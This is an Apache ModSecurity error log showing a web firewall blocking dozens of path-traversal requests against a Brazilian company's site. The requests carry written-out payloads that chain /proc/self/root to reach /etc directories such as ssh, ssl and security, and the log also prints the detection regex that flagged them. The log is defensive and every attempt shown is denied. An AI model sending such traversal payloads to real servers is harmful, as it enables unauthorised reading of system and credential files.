[Mon Mar 16 19:14:40.770854 2026] [:error] [pid 14895:tid 140411548894976] [client 74.7.241.46:43214] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiA0FajLEzk2WiQ-102IAAAApc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:14:42.172871 2026] [:error] [pid 10651:tid 140411733534464] [client 74.7.241.46:46042] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiA0rysWC90G-1nBrBp7gAAAYE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:14:57.749182 2026] [:error] [pid 29802:tid 140411574073088] [client 74.7.241.46:41402] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiA4c_BxrYCr4hPDw8OYwAAAdQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:15:07.867848 2026] [:error] [pid 10651:tid 140411624429312] [client 74.7.244.31:53548] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiA67ysWC90G-1nBrBp9gAAAY4"]
[Mon Mar 16 19:15:30.311287 2026] [:error] [pid 29802:tid 140411565680384] [client 74.7.243.203:41898] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBAs_BxrYCr4hPDw8OoQAAAdU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:15:44.120842 2026] [:error] [pid 15568:tid 140411548894976] [client 74.7.241.46:36492] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBEKQpVkWug9HeOt9XxAAAA1c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:15:45.469514 2026] [:error] [pid 14895:tid 140411683178240] [client 74.7.241.46:38014] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBEVajLEzk2WiQ-102KgAAAoc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:15:46.679180 2026] [:error] [pid 21806:tid 140411699963648] [client 74.7.241.46:38026] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBEtSswJuvopo3lOiFEwAAAIU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:15:47.997678 2026] [:error] [pid 21806:tid 140411649607424] [client 74.7.241.46:38034] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBE9SswJuvopo3lOiFFAAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:15:48.893199 2026] [:error] [pid 10651:tid 140411582465792] [client 74.7.243.203:55932] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBFLysWC90G-1nBrBqCAAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/run/initramfs/state/etc
[Mon Mar 16 19:15:50.319425 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.241.46:43330] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBFrABkC4fWIHEf8EdJAAAAEE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:15:53.790784 2026] [:error] [pid 10831:tid 140411641214720] [client 74.7.241.46:43346] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBGY6lpbStxTqkSkuMwgAAAkw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:15:59.463452 2026] [:error] [pid 21805:tid 140411683178240] [client 74.7.241.46:43362] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBH7ABkC4fWIHEf8EdKwAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:16:00.753215 2026] [:error] [pid 29802:tid 140411557287680] [client 74.7.241.46:35172] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBIM_BxrYCr4hPDw8O0wAAAdY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:16:03.992782 2026] [:error] [pid 21806:tid 140411708356352] [client 74.7.241.46:35184] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBI9SswJuvopo3lOiFFwAAAIQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:16:06.383201 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.241.46:35186] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBJtSswJuvopo3lOiFGQAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:16:13.263242 2026] [:error] [pid 29802:tid 140411725141760] [client 74.7.241.46:35192] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBLc_BxrYCr4hPDw8O8QAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:16:16.526933 2026] [:error] [pid 14895:tid 140411683178240] [client 74.7.241.46:36446] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBL1ajLEzk2WiQ-102OAAAAoc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:16:17.842929 2026] [:error] [pid 10651:tid 140411683178240] [client 74.7.241.46:36450] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBMbysWC90G-1nBrBqCQAAAYc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:16:19.014007 2026] [:error] [pid 10831:tid 140411733534464] [client 74.7.241.46:37142] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBM46lpbStxTqkSkuMxQAAAkE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:16:20.342735 2026] [:error] [pid 15568:tid 140411607643904] [client 74.7.241.46:37150] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBNKQpVkWug9HeOt9XyAAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:16:21.544343 2026] [:error] [pid 15568:tid 140411616036608] [client 74.7.241.46:37154] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBNaQpVkWug9HeOt9XyQAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
